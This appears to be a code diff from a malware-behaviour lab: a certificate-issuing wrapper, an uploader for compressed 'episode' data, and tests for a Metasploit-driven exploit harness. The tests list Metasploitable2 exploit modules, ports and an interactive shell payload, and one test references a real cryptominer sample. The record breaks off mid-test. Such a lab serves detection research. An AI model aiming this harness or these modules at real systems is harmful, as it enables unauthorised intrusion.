ISSUER="${WG_PKI_ISSUER:-}"
if [[ -z "$ISSUER" ]]; then
    for cand in \
        /opt/wg-pki/scripts/issue-cis490-client-cert.sh \
        /home/max/wg-pki/scripts/issue-cis490-client-cert.sh \
        /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh; do
        if [[ -x "$cand" ]]; then ISSUER="$cand"; break; fi
    done
fi
if [[ -z "$ISSUER" || ! -x "$ISSUER" ]]; then
    echo "wrapper: no issue-cis490-client-cert.sh found; tried /opt/wg-pki, /home/max/wg-pki, /home/max/.env/wg-pki" >&2
    exit 2
fi

OUT_ROOT="/var/lib/wg-pki/issued"
if [[ $# -lt 1 ]]; then
    echo "usage: $0 <host_id> [--out-dir DIR] [--days N]" >&2
    exit 2
fi
HOST_ID="$1"; shift

# Pull off any --out-dir already passed; we override.
EXTRA=()
while [[ $# -gt 0 ]]; do
    case "$1" in
        --out-dir)
            # Drop the flag and its value. A bare `shift 2` fails (and
            # aborts under `set -e`) when --out-dir is the last argument.
            shift
            if [[ $# -gt 0 ]]; then shift; fi
            ;;
        *) EXTRA+=("$1"); shift ;;
    esac
done

mkdir -p "$OUT_ROOT/$HOST_ID"
exec env WG_PKI_STATE=/var/lib/wg-pki \
    "$ISSUER" "$HOST_ID" --out-dir "$OUT_ROOT/$HOST_ID" "${EXTRA[@]}"

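The wrapper's argument handling (drop any caller-supplied `--out-dir`, then force its own) can be sketched in Python to make the rule explicit. This is an illustration only, assuming the same fixed output root as the script; `strip_out_dir` and `build_issuer_argv` are hypothetical names, and the issuer path in the usage line is just one of the candidates the wrapper probes.

```python
from __future__ import annotations

OUT_ROOT = "/var/lib/wg-pki/issued"  # same fixed root the wrapper uses


def strip_out_dir(args: list[str]) -> list[str]:
    """Return args with every ``--out-dir <value>`` pair removed."""
    kept: list[str] = []
    it = iter(args)
    for arg in it:
        if arg == "--out-dir":
            next(it, None)  # discard the value, if one follows
            continue
        kept.append(arg)
    return kept


def build_issuer_argv(issuer: str, host_id: str, extra: list[str]) -> list[str]:
    """Assemble the argv the wrapper would exec (hypothetical helper)."""
    return [issuer, host_id, "--out-dir", f"{OUT_ROOT}/{host_id}", *strip_out_dir(extra)]


if __name__ == "__main__":
    print(build_issuer_argv(
        "/opt/wg-pki/scripts/issue-cis490-client-cert.sh",
        "lab-7",
        ["--out-dir", "/tmp/elsewhere", "--days", "30"],
    ))
```

Treating a trailing `--out-dir` with no value as "nothing to drop" keeps the helper total, so a malformed caller argument cannot abort the issuance.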
0
shipper/__init__.py Normal file

106
shipper/__main__.py Normal file

@ -0,0 +1,106 @@
"""``cis490-shipper`` CLI entrypoint.

Modes:
    --ping      hit /v1/ping; exit 0 if 200/ok, non-zero otherwise.
                No tarball flow; index.jsonl on the receiver is untouched.
    --once      one scan pass over data/episodes/, ship anything done, exit.
    (default)   long-running daemon; rescans every scan_interval_s.
"""
from __future__ import annotations

import argparse
import json
import logging
import signal
import sys
from pathlib import Path

from .config import ShipperConfig
from .queue import ShipperQueue
from .transport import ShipperTransport


def _setup_logging(level: str) -> None:
    logging.basicConfig(
        level=getattr(logging, level.upper(), logging.INFO),
        format="%(asctime)s %(levelname)s %(name)s %(message)s",
    )


def main(argv: list[str] | None = None) -> int:
    parser = argparse.ArgumentParser(prog="cis490-shipper")
    parser.add_argument(
        "--config",
        default="/etc/cis490/lab-host.toml",
        help="Path to lab-host config (TOML)",
    )
    parser.add_argument(
        "--ping",
        action="store_true",
        help="Hit /v1/ping on the receiver and exit",
    )
    parser.add_argument(
        "--once",
        action="store_true",
        help="One scan pass, then exit (default is long-running daemon)",
    )
    parser.add_argument("--log-level", default="INFO")
    args = parser.parse_args(argv)

    _setup_logging(args.log_level)
    log = logging.getLogger("cis490.shipper")

    try:
        cfg = ShipperConfig.load(args.config)
    except (FileNotFoundError, ValueError) as e:
        log.error("config error: %s", e)
        return 2

    transport = ShipperTransport(cfg)

    if args.ping:
        result = transport.ping()
        # Print structured one-liner for CI / test pipelines.
        print(json.dumps({
            "ok": result.ok,
            "status_code": result.status_code,
            "host_id": cfg.host_id,
            "receiver": cfg.receiver.url,
            "body": result.body,
            "error": result.error,
        }))
        return 0 if result.ok else 1

    queue = ShipperQueue(cfg, transport)

    if args.once:
        result = queue.run_once()
        log.info(
            "scan complete: scanned=%d shipped=%d transient=%d conflicts=%d fatal=%d",
            result.scanned, result.shipped, result.transient_failures,
            result.conflicts, result.fatal,
        )
        # Exit code reflects fatal-only; transient failures aren't an error
        # because the next pass / service restart will retry.
        return 1 if result.fatal else 0

    # Daemon mode
    stopping = False

    def _stop(signum, frame):  # noqa: ARG001
        nonlocal stopping
        log.info("received signal %s; finishing pass and exiting", signum)
        stopping = True

    signal.signal(signal.SIGTERM, _stop)
    signal.signal(signal.SIGINT, _stop)

    log.info(
        "shipper starting: host_id=%s data_root=%s receiver=%s",
        cfg.host_id, cfg.data_root, cfg.receiver.url,
    )
    queue.run_forever(stop_check=lambda: stopping)
    return 0


if __name__ == "__main__":
    sys.exit(main())

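Because `--ping` prints a single JSON object, a CI step or health check could consume it directly. A minimal sketch, assuming only the keys the entrypoint above emits (`ok`, `status_code`, `host_id`, `receiver`, `body`, `error`); `summarize_ping` is a hypothetical helper and the sample lines are made up for illustration.

```python
from __future__ import annotations

import json


def summarize_ping(line: str) -> str:
    """Turn one ``cis490-shipper --ping`` output line into a short status."""
    report = json.loads(line)
    route = f"{report['host_id']} -> {report['receiver']}"
    if report["ok"]:
        return f"{route}: ok"
    return f"{route}: FAILED (status {report['status_code']}: {report['error']})"


# Illustrative lines in the shape the CLI prints; values are invented.
GOOD = json.dumps({
    "ok": True, "status_code": 200, "host_id": "lab-7",
    "receiver": "https://collector.wg", "body": {"ok": True}, "error": None,
})
BAD = json.dumps({
    "ok": False, "status_code": 0, "host_id": "lab-7",
    "receiver": "https://collector.wg", "body": None, "error": "connection refused",
})

if __name__ == "__main__":
    print(summarize_ping(GOOD))
    print(summarize_ping(BAD))
```

A `status_code` of 0 corresponds to the transport never getting an HTTP response, which is why the error string is included alongside it.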
91
shipper/config.py Normal file

@ -0,0 +1,91 @@
"""Lab-host shipper config — loaded from /etc/cis490/lab-host.toml."""
from __future__ import annotations

import tomllib
from dataclasses import dataclass, field
from pathlib import Path


@dataclass(frozen=True)
class ReceiverEndpoint:
    url: str  # e.g. "https://collector.wg"
    ca_bundle: Path | None = None
    client_cert: Path | None = None
    client_key: Path | None = None
    bearer_token: str | None = None
    verify_tls: bool = True


@dataclass(frozen=True)
class ShipperConfig:
    host_id: str
    data_root: Path  # Lab-host data root; episodes/, outbox/, shipped/ live here.
    receiver: ReceiverEndpoint
    # Daemon mode: how often to scan for new done.marker files.
    scan_interval_s: float = 5.0
    # PUT timeout per episode. Tarballs are bounded by max_episode_bytes;
    # at WG speeds this is well under 60s for a typical episode.
    request_timeout_s: float = 60.0
    # Backoff schedule on transient (5xx / network) failures, in seconds,
    # capped at the last entry. The shipper's scan loop will pick the
    # episode up again on the next pass regardless.
    backoff_seconds: tuple[float, ...] = (1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0)
    # Local retention before pruning data/shipped/.
    keep_local_for_days: int = 7

    @property
    def episodes_dir(self) -> Path:
        return self.data_root / "episodes"

    @property
    def outbox_dir(self) -> Path:
        return self.data_root / "outbox"

    @property
    def shipped_dir(self) -> Path:
        return self.data_root / "shipped"

    @classmethod
    def load(cls, path: str | Path) -> "ShipperConfig":
        with open(path, "rb") as f:
            data = tomllib.load(f)

        host_id = data.get("host_id")
        if not isinstance(host_id, str) or not host_id:
            raise ValueError("lab-host config: host_id (string) required at top level")

        paths = data.get("paths", {})
        data_root = Path(paths.get("data_root", "/var/lib/cis490/data")).resolve()

        rcv = data.get("receiver", {})
        url = rcv.get("url")
        if not isinstance(url, str) or not url:
            raise ValueError("lab-host config: receiver.url required")
        receiver = ReceiverEndpoint(
            url=url.rstrip("/"),
            ca_bundle=_optional_path(rcv.get("ca_bundle")),
            client_cert=_optional_path(rcv.get("client_cert")),
            client_key=_optional_path(rcv.get("client_key")),
            bearer_token=rcv.get("bearer_token"),
            verify_tls=bool(rcv.get("verify_tls", True)),
        )

        retention = data.get("retention", {})
        return cls(
            host_id=host_id,
            data_root=data_root,
            receiver=receiver,
            scan_interval_s=float(data.get("shipper", {}).get("scan_interval_s", 5.0)),
            request_timeout_s=float(data.get("shipper", {}).get("request_timeout_s", 60.0)),
            keep_local_for_days=int(retention.get("keep_local_for_days", 7)),
        )


def _optional_path(v: object) -> Path | None:
    if v in (None, ""):
        return None
    if isinstance(v, str):
        return Path(v).expanduser()
    # ValueError (not TypeError) so the CLI's config-error handler, which
    # catches FileNotFoundError and ValueError, reports it cleanly.
    raise ValueError(f"expected path string, got {type(v).__name__}")

195
shipper/queue.py Normal file

@ -0,0 +1,195 @@
"""Shipper episode queue — scan, compress, ship, retire.

State machine, mirroring docs/transport.md:

    data/episodes/<id>/done.marker
            |
            v
    tar+zstd  data/outbox/<id>.tar.zst.partial
            |
            v
    rename    data/outbox/<id>.tar.zst
            |
            v
    PUT to receiver
            |
            +-- 200/201  mv data/episodes/<id> data/shipped/<id>
            |            rm data/outbox/<id>.tar.zst
            |
            +-- 409      leave files in place (the local + remote tarball
            |            differ; manual triage)
            |
            +-- 5xx/net  leave outbox tarball; retry on next pass
            |
            +-- 4xx      log + skip (caller-side bug, doesn't self-heal)

Idempotent on every pass. A crash mid-tar leaves only a ``.partial``
which the next pass overwrites. A crash mid-PUT leaves the tarball in
``outbox/`` and the next pass re-ships it; the receiver responds 200
on a matching sha256, 409 on a divergent one.
"""
from __future__ import annotations

import logging
import shutil
import subprocess
import tarfile
import tempfile
import time
from dataclasses import dataclass
from pathlib import Path

from .config import ShipperConfig
from .transport import ShipperTransport, ShipResult, hash_file

log = logging.getLogger("cis490.shipper.queue")


@dataclass(frozen=True)
class PassResult:
    scanned: int
    shipped: int
    transient_failures: int
    conflicts: int
    fatal: int


class ShipperQueue:
    def __init__(self, cfg: ShipperConfig, transport: ShipperTransport) -> None:
        self.cfg = cfg
        self.transport = transport
        cfg.episodes_dir.mkdir(parents=True, exist_ok=True)
        cfg.outbox_dir.mkdir(parents=True, exist_ok=True)
        cfg.shipped_dir.mkdir(parents=True, exist_ok=True)

    # ---- main entry point ---------------------------------------------

    def run_once(self) -> PassResult:
        """One scan pass. Returns counts for logging / tests."""
        ready = self._ready_episodes()
        scanned = len(ready)
        shipped = 0
        transient = 0
        conflicts = 0
        fatal = 0
        for ep_dir in ready:
            episode_id = ep_dir.name
            try:
                tarball, sha = self._tar_episode(ep_dir)
            except Exception:
                log.exception("tar failed for %s", episode_id)
                transient += 1
                continue
            res = self.transport.ship_tarball(episode_id, tarball, sha)
            log.info(
                "ship %s -> %s (%d) %s",
                episode_id, res.status, res.status_code, res.error or "",
            )
            if res.status in ("stored", "already-present"):
                self._retire(ep_dir, tarball)
                shipped += 1
            elif res.status == "conflict":
                conflicts += 1
                # Keep the tarball + episode dir in place. Operator must
                # decide whether to drop our copy or fix the remote one.
            elif res.status == "transient":
                transient += 1
            else:  # fatal
                fatal += 1
        return PassResult(
            scanned=scanned,
            shipped=shipped,
            transient_failures=transient,
            conflicts=conflicts,
            fatal=fatal,
        )

    def run_forever(self, *, stop_check=lambda: False) -> None:
        while not stop_check():
            try:
                self.run_once()
            except Exception:
                log.exception("scan pass crashed; sleeping anyway")
            # Coarse sleep: we don't need precise scheduling and we
            # don't want a tight loop on errors.
            t0 = time.monotonic()
            while time.monotonic() - t0 < self.cfg.scan_interval_s:
                if stop_check():
                    return
                time.sleep(0.5)

    # ---- internals -----------------------------------------------------

    def _ready_episodes(self) -> list[Path]:
        out: list[Path] = []
        if not self.cfg.episodes_dir.exists():
            return out
        for ep in sorted(self.cfg.episodes_dir.iterdir()):
            if ep.is_dir() and (ep / "done.marker").exists():
                out.append(ep)
        return out

    def _tar_episode(self, ep_dir: Path) -> tuple[Path, str]:
        """Tar+zstd the episode dir into outbox. Idempotent: reuses a
        finished tarball left by an earlier pass and overwrites any
        prior partial. Returns ``(tarball_path, sha256_hex)``."""
        episode_id = ep_dir.name
        outbox = self.cfg.outbox_dir
        partial = outbox / f"{episode_id}.tar.zst.partial"
        final = outbox / f"{episode_id}.tar.zst"
        partial.unlink(missing_ok=True)
        if final.exists():
            # A finished tarball survives a crash or failed PUT (the
            # rename at the end of this method is atomic), so re-ship
            # it as the module docstring describes instead of
            # recompressing the episode on every pass.
            return final, hash_file(final)
        # We use the system `zstd` for streaming compression: pipe a
        # tar stream into `zstd -T0 -19` to get a tarball without
        # buffering the whole tar in memory or pulling in the
        # python-zstandard dependency. There is no in-process fallback;
        # a missing binary is surfaced as an error below.
        if _which_zstd():
            with partial.open("wb") as zout:
                proc = subprocess.Popen(
                    ["zstd", "-q", "-T0", "-19", "--stdout"],
                    stdin=subprocess.PIPE, stdout=zout,
                )
                assert proc.stdin is not None
                with tarfile.open(fileobj=proc.stdin, mode="w|") as tf:
                    tf.add(ep_dir, arcname=episode_id, recursive=True)
                proc.stdin.close()
                rc = proc.wait()
            if rc != 0:
                partial.unlink(missing_ok=True)
                raise RuntimeError(f"zstd exited {rc}")
        else:
            # Python's built-in zlib/gzip is NOT compatible (we want
            # zstd). Surface the missing binary rather than silently
            # producing a non-zstd tarball.
            partial.unlink(missing_ok=True)
            raise RuntimeError(
                "the `zstd` binary is required on the lab host. "
                "Install it via your package manager."
            )
        sha = hash_file(partial)
        partial.replace(final)
        return final, sha

    def _retire(self, ep_dir: Path, tarball: Path) -> None:
        """Move episode dir → shipped/, drop the tarball."""
        target = self.cfg.shipped_dir / ep_dir.name
        if target.exists():
            # Belt-and-suspenders: re-shipping an already-retired
            # episode shouldn't happen (the dir was moved), but if it
            # does, prefer the existing copy and just clean up.
            shutil.rmtree(ep_dir, ignore_errors=True)
        else:
            ep_dir.replace(target)
        tarball.unlink(missing_ok=True)


def _which_zstd() -> bool:
    return shutil.which("zstd") is not None

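`ShipperConfig.backoff_seconds` is described as a schedule "capped at the last entry", but the queue code shown here retries purely on the scan interval and never consults it. As a hedged illustration of what that cap means, the sketch below looks up a delay for the Nth consecutive transient failure; `backoff_delay` is a hypothetical helper, not something the repo is known to contain.

```python
from __future__ import annotations

# Default schedule copied from ShipperConfig.backoff_seconds.
DEFAULT_SCHEDULE: tuple[float, ...] = (
    1.0, 2.0, 4.0, 8.0, 16.0, 32.0, 60.0, 120.0, 300.0,
)


def backoff_delay(attempt: int, schedule: tuple[float, ...] = DEFAULT_SCHEDULE) -> float:
    """Delay in seconds before retry number ``attempt`` (0-based).

    Attempts past the end of the schedule reuse the last entry.
    """
    if attempt < 0:
        raise ValueError("attempt must be >= 0")
    if not schedule:
        raise ValueError("schedule must not be empty")
    return schedule[min(attempt, len(schedule) - 1)]


if __name__ == "__main__":
    for n in (0, 3, 8, 50):
        print(n, backoff_delay(n))
```

Clamping the index keeps a long receiver outage from growing the delay without bound while still spacing out the early retries.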
203
shipper/transport.py Normal file

@ -0,0 +1,203 @@
"""HTTP transport for the lab-host shipper.

Two operations against the receiver:

    POST /v1/ping                                smoke test
    PUT  /v1/episodes/<host>/<episode>.tar.zst   episode upload

Auth is mTLS (client cert from wg-pki) when configured. A bearer token
is supported as a stand-in during early bring-up before the cert is
issued; production runs should set both.

The transport returns small dataclasses rather than throwing; the
caller (shipper queue) decides whether to retry, move to shipped/, or
alert. This keeps the retry policy in one place.
"""
from __future__ import annotations

import hashlib
import logging
import ssl
from dataclasses import dataclass
from pathlib import Path
from typing import Any

import httpx

from .config import ReceiverEndpoint, ShipperConfig

log = logging.getLogger("cis490.shipper.transport")

SCHEMA_VERSION = 1


@dataclass(frozen=True)
class PingResult:
    ok: bool
    status_code: int
    body: dict[str, Any] | None
    error: str | None


@dataclass(frozen=True)
class ShipResult:
    status: str  # "stored" | "already-present" | "conflict" | "transient" | "fatal"
    status_code: int
    sha256: str | None
    body: dict[str, Any] | None
    error: str | None


def _build_ssl_context(rcv: ReceiverEndpoint) -> ssl.SSLContext | bool:
    """Build an SSL context honoring the wg-pki CA bundle + client cert.

    Returns ``False`` for non-HTTPS URLs, otherwise an ``ssl.SSLContext``.
    httpx accepts both for ``verify=``; we use a context so we can
    attach the client cert for mTLS."""
    if not rcv.url.lower().startswith("https://"):
        return False
    ctx = ssl.create_default_context(
        cafile=str(rcv.ca_bundle) if rcv.ca_bundle else None,
    )
    if not rcv.verify_tls:
        # Dev-only path; production lab-hosts should always pin the
        # wg-pki CA. Logged loudly so it doesn't slip through.
        log.warning("TLS verification disabled; dev-only configuration")
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
    if rcv.client_cert and rcv.client_key:
        ctx.load_cert_chain(str(rcv.client_cert), str(rcv.client_key))
    return ctx


class ShipperTransport:
    def __init__(self, cfg: ShipperConfig) -> None:
        self.cfg = cfg
        self._verify = _build_ssl_context(cfg.receiver)

    # ---- ping ----------------------------------------------------------

    def ping(self) -> PingResult:
        url = f"{self.cfg.receiver.url}/v1/ping"
        headers = self._common_headers()
        try:
            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c:
                r = c.post(url, headers=headers, content=b"")
        except httpx.HTTPError as e:
            return PingResult(ok=False, status_code=0, body=None, error=str(e))
        body: dict[str, Any] | None = None
        try:
            body = r.json()
        except Exception:
            pass
        if r.status_code == 200 and isinstance(body, dict) and body.get("ok"):
            return PingResult(ok=True, status_code=200, body=body, error=None)
        return PingResult(
            ok=False,
            status_code=r.status_code,
            body=body,
            error=f"unexpected status {r.status_code}",
        )

    # ---- ship ----------------------------------------------------------

    def ship_tarball(
        self,
        episode_id: str,
        tarball_path: Path,
        sha256_hex: str,
    ) -> ShipResult:
        url = (
            f"{self.cfg.receiver.url}/v1/episodes/"
            f"{self.cfg.host_id}/{episode_id}.tar.zst"
        )
        size = tarball_path.stat().st_size
        headers = self._common_headers() | {
            "Content-Type": "application/zstd",
            "Content-Length": str(size),
            "X-Content-SHA256": sha256_hex,
            "X-Episode-Id": episode_id,
        }
        try:
            with httpx.Client(verify=self._verify, timeout=self.cfg.request_timeout_s) as c, \
                    tarball_path.open("rb") as body:
                # httpx streams from a file-like object via the `content=` kwarg.
                r = c.put(url, headers=headers, content=body)
        except httpx.HTTPError as e:
            return ShipResult(
                status="transient",
                status_code=0,
                sha256=None,
                body=None,
                error=str(e),
            )
        body_json: dict[str, Any] | None = None
        try:
            body_json = r.json()
        except Exception:
            pass
        if r.status_code == 201:
            return ShipResult(
                status="stored",
                status_code=201,
                sha256=sha256_hex,
                body=body_json,
                error=None,
            )
        if r.status_code == 200:
            return ShipResult(
                status="already-present",
                status_code=200,
                sha256=sha256_hex,
                body=body_json,
                error=None,
            )
        if r.status_code == 409:
            return ShipResult(
                status="conflict",
                status_code=409,
                sha256=sha256_hex,
                body=body_json,
                error="receiver already has a different sha256 for this id",
            )
        if 500 <= r.status_code < 600:
            return ShipResult(
                status="transient",
                status_code=r.status_code,
                sha256=None,
                body=body_json,
                error=f"server error {r.status_code}",
            )
        # Anything else (4xx other than 409, or an unexpected 2xx/3xx):
        # caller-side bug, so don't retry.
        return ShipResult(
            status="fatal",
            status_code=r.status_code,
            sha256=None,
            body=body_json,
            error=f"client error {r.status_code}",
        )

    # ---- helpers -------------------------------------------------------

    def _common_headers(self) -> dict[str, str]:
        h: dict[str, str] = {
            "X-Lab-Host": self.cfg.host_id,
            "X-Schema-Version": str(SCHEMA_VERSION),
        }
        if self.cfg.receiver.bearer_token:
            h["Authorization"] = f"Bearer {self.cfg.receiver.bearer_token}"
        return h


def hash_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1024 * 1024), b""):
            h.update(chunk)
    return h.hexdigest()

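The response handling in `ship_tarball` reduces to a mapping from HTTP status code to one of five outcome strings. The sketch below restates that mapping as a pure function so the rules can be checked in isolation; `classify_status` is a hypothetical name, and a code of 0 stands in for the "no HTTP response" case that the transport reports as transient.

```python
def classify_status(status_code: int) -> str:
    """Map a receiver status code to the shipper's outcome label."""
    if status_code == 0:
        return "transient"          # network error, no response received
    if status_code == 201:
        return "stored"             # receiver wrote a new episode
    if status_code == 200:
        return "already-present"    # same sha256 already on the receiver
    if status_code == 409:
        return "conflict"           # different sha256 for the same id
    if 500 <= status_code < 600:
        return "transient"          # server-side failure, retry later
    return "fatal"                  # anything else is not retried


if __name__ == "__main__":
    for code in (201, 200, 409, 503, 404, 0):
        print(code, classify_status(code))
```

Only "stored" and "already-present" lead the queue to retire an episode; every other label leaves the episode directory where it is.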

@ -74,6 +74,57 @@ def test_episode_id_can_be_overridden(tmp_path: Path) -> None:
    assert result.episode_dir == tmp_path / "episodes" / "01TEST"


def test_meta_sample_records_full_sample_when_passed(tmp_path: Path) -> None:
    """EpisodeConfig.sample → meta.sample carries identity + kind so
    trainers can join episodes by family/sha256 without re-deriving
    from events. With no Sample, meta.sample stays null."""
    import os as _os
    from samples.manifest import Sample

    s = Sample(
        name="xmrig-cryptominer",
        family="XMRig",
        category="cryptominer",
        profile="cpu-saturate",
        sha256="abc" * 21 + "d",  # 64 hex
        source="MalwareBazaar",
    )
    cfg = EpisodeConfig(
        target_pid=_os.getpid(),
        duration_s=0.1,
        interval_ms=50,
        data_root=tmp_path,
        sample=s,
    )
    result = EpisodeRunner(cfg).run()
    meta = json.loads((result.episode_dir / "meta.json").read_text())
    assert meta["sample"] is not None
    assert meta["sample"]["name"] == "xmrig-cryptominer"
    assert meta["sample"]["family"] == "XMRig"
    assert meta["sample"]["category"] == "cryptominer"
    assert meta["sample"]["profile"] == "cpu-saturate"
    assert meta["sample"]["kind"] == "real"
    assert meta["sample"]["sha256"] == "abc" * 21 + "d"


def test_meta_sample_is_null_for_v1_path(tmp_path: Path) -> None:
    """No sample passed → the v1 fallback path. meta.sample stays
    null so trainers can detect (and filter out) info-less runs."""
    import os as _os

    cfg = EpisodeConfig(
        target_pid=_os.getpid(),
        duration_s=0.1,
        interval_ms=50,
        data_root=tmp_path,
    )
    result = EpisodeRunner(cfg).run()
    meta = json.loads((result.episode_dir / "meta.json").read_text())
    assert meta["sample"] is None


def test_episode_writes_done_marker_last(tmp_path: Path) -> None:
    """done.marker should not appear until meta.json has ended_at_wall set."""
    cfg = EpisodeConfig(

484
tests/test_exploits.py Normal file

@ -0,0 +1,484 @@
"""Tests for the Tier-3 exploit driver and its module loader.

The msfrpc transport itself is exercised against a fake client so the
suite runs in-process. A live-msfrpcd integration test is out of
scope here; the wire format is small and the high-value coverage is
the phase-to-action mapping plus the events the driver emits.
"""
from __future__ import annotations

import json
from pathlib import Path
from typing import Any

import pytest

from exploits.driver import DriverConfig, MSFExploitDriver
from exploits.modules import ModuleConfig, load_module_config

REPO_ROOT = Path(__file__).resolve().parent.parent
MODULES_DIR = REPO_ROOT / "exploits" / "modules"


# -----------------------------------------------------------------------
# Module config loader
# -----------------------------------------------------------------------

def test_module_catalog_has_at_least_five_metasploitable2_vectors() -> None:
    """The fleet's entry-vector variety depends on the module catalog
    being populated. Five Metasploitable2 vectors is the minimum
    that gives the trainer a non-trivial diversity of
    armed-to-infecting transition shapes."""
    from exploits.modules import load_module_configs

    catalog = load_module_configs(MODULES_DIR)
    assert len(catalog) >= 5, \
        f"only {len(catalog)} modules; need at least 5 for fleet variety"
    names = set(catalog.keys())
    expected = {
        "vsftpd_234_backdoor",
        "samba_usermap_script",
        "distccd_command_exec",
        "php_cgi_arg_injection",
        "unreal_ircd_3281_backdoor",
    }
    missing = expected - names
    assert not missing, f"missing canonical modules: {missing}"


def test_load_vsftpd_module_config_round_trip() -> None:
    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
    assert cfg.name == "vsftpd_234_backdoor"
    assert cfg.module_type == "exploit"
    assert cfg.module_path == "unix/ftp/vsftpd_234_backdoor"
    assert cfg.options["RPORT"] == 21
    assert cfg.options["RHOSTS"] == "{{ target_ip }}"
    assert cfg.payload_path == "cmd/unix/interact"


def test_render_options_substitutes_target_ip() -> None:
    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
    rendered = cfg.render_options(target_ip="10.200.0.10")
    assert rendered["RHOSTS"] == "10.200.0.10"
    assert rendered["RPORT"] == 21
    assert rendered["PAYLOAD"] == "cmd/unix/interact"


def test_select_module_is_deterministic() -> None:
    from exploits.modules import load_module_configs, select_module

    catalog = load_module_configs(MODULES_DIR)
    a = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
    b = select_module(catalog, host_id="lab-7", slot=2, episode_index=11)
    assert a is b


def test_select_module_diversifies_across_hosts() -> None:
    from exploits.modules import load_module_configs, select_module

    catalog = load_module_configs(MODULES_DIR)
    matches = 0
    for slot in range(20):
        a = select_module(catalog, host_id="alice", slot=slot, episode_index=0)
        b = select_module(catalog, host_id="bob", slot=slot, episode_index=0)
        if a is b:
            matches += 1
    assert matches < 15, "host_id seed isn't producing module variety"


def test_select_module_walks_catalog() -> None:
    from exploits.modules import load_module_configs, select_module

    catalog = load_module_configs(MODULES_DIR)
    seen = set()
    for ep in range(200):
        seen.add(select_module(catalog, host_id="lab-x", slot=0, episode_index=ep).name)
    assert seen == set(catalog.keys()), \
        f"only saw {len(seen)}/{len(catalog)} modules across 200 episodes"


def test_module_target_port_pulls_rport() -> None:
    from exploits.modules import load_module_configs, module_target_port

    catalog = load_module_configs(MODULES_DIR)
    assert module_target_port(catalog["vsftpd_234_backdoor"]) == 21
    assert module_target_port(catalog["samba_usermap_script"]) == 139
    assert module_target_port(catalog["distccd_command_exec"]) == 3632
    assert module_target_port(catalog["php_cgi_arg_injection"]) == 80
    assert module_target_port(catalog["unreal_ircd_3281_backdoor"]) == 6667


def test_render_options_handles_both_brace_styles(tmp_path: Path) -> None:
    p = tmp_path / "x.toml"
    p.write_text(
        '[module]\n'
        'type = "exploit"\n'
        'path = "unix/ftp/example"\n'
        '[module.options]\n'
        'RHOSTS = "{{target_ip}}"\n'
        'LHOST = "{{ target_ip }}"\n'
    )
    cfg = load_module_config(p)
    rendered = cfg.render_options(target_ip="10.0.0.5")
    assert rendered["RHOSTS"] == "10.0.0.5"
    assert rendered["LHOST"] == "10.0.0.5"


def test_load_rejects_missing_module_path(tmp_path: Path) -> None:
    p = tmp_path / "bad.toml"
    p.write_text('[module]\ntype = "exploit"\n')
    with pytest.raises(ValueError, match="module.path"):
        load_module_config(p)


def test_load_rejects_unknown_module_type(tmp_path: Path) -> None:
    p = tmp_path / "bad.toml"
    p.write_text(
        '[module]\ntype = "evil"\npath = "unix/ftp/x"\n'
    )
    with pytest.raises(ValueError, match="module.type"):
        load_module_config(p)


# -----------------------------------------------------------------------
# Exploit driver: phase transitions against a fake MSFRpcClient
# -----------------------------------------------------------------------

class FakeMSFRpcClient:
    """Stand-in that records every method called and lets a test
    script the apparent state of msfrpcd (sessions, return values)."""

    def __init__(self, *, sessions_after_fire: dict[int, dict[str, Any]] | None = None) -> None:
        self.calls: list[tuple[str, tuple, dict]] = []
        self.logged_in = False
        self._fired = False
        self._sessions: dict[int, dict[str, Any]] = {}
        self._sessions_after_fire = sessions_after_fire or {}
        self.shell_writes: list[tuple[int, str]] = []

    def _record(self, name: str, *args, **kwargs) -> None:
        self.calls.append((name, args, kwargs))

    def login(self) -> None:
        self._record("login")
        self.logged_in = True

    def logout(self) -> None:
        self._record("logout")
        self.logged_in = False

    def session_list(self) -> dict[int, dict[str, Any]]:
        self._record("session_list")
        return dict(self._sessions)

    def module_execute(self, mtype: str, mname: str, opts: dict) -> dict:
        self._record("module_execute", mtype, mname, opts)
        self._fired = True
        # Simulate sessions appearing after the exploit fires.
        self._sessions = dict(self._sessions_after_fire)
        return {"job_id": 7, "uuid": "fake-uuid"}

    def job_stop(self, job_id) -> dict:
        self._record("job_stop", job_id)
        return {"result": "success"}

    def session_shell_write(self, sid: int, data: str) -> dict:
        self._record("session_shell_write", sid, data)
        if not data.endswith("\n"):
            data = data + "\n"
        self.shell_writes.append((sid, data))
        return {"write_count": str(len(data))}

    def session_shell_read(self, sid: int) -> str:
        self._record("session_shell_read", sid)
        return "uid=0(root) gid=0(root)\n"

    def session_stop(self, sid: int) -> dict:
        self._record("session_stop", sid)
        self._sessions.pop(sid, None)
        return {"result": "success"}


def _make_driver(
    sessions_after_fire: dict[int, dict[str, Any]] | None = None,
    target_ip: str = "10.200.0.10",
) -> tuple[MSFExploitDriver, FakeMSFRpcClient, list[tuple[str, dict]]]:
    cfg = load_module_config(MODULES_DIR / "vsftpd_234_backdoor.toml")
    client = FakeMSFRpcClient(sessions_after_fire=sessions_after_fire)
    events: list[tuple[str, dict]] = []

    def emit(event: str, **extra: Any) -> None:
        events.append((event, extra))

    driver = MSFExploitDriver(
        client=client,  # type: ignore[arg-type]
        module=cfg,
        cfg=DriverConfig(
            target_ip=target_ip,
session_open_timeout_s=0.5, # tests must not block
),
emit_event=emit,
)
return driver, client, events
def test_driver_setup_authenticates_and_snapshots_sessions() -> None:
driver, client, events = _make_driver()
client._sessions = {99: {"type": "shell"}} # pre-existing session
driver.setup()
assert client.logged_in is True
assert driver._sessions_seen_at_arm == {99}
assert events[0][0] == "driver_setup"
assert events[0][1]["module"] == "unix/ftp/vsftpd_234_backdoor"
assert events[0][1]["target_ip"] == "10.200.0.10"
def test_full_phase_walk_emits_expected_event_order() -> None:
driver, client, events = _make_driver(
sessions_after_fire={1: {"type": "shell", "tunnel_peer": "10.200.0.10:21"}},
)
driver.setup()
for phase in [
"clean", "armed", "infecting",
"infected_running", "dormant",
"infected_running", "dormant",
"clean",
]:
driver.set_phase(phase)
driver.teardown()
names = [e[0] for e in events]
# Order matters: fire comes before session_open, which comes before
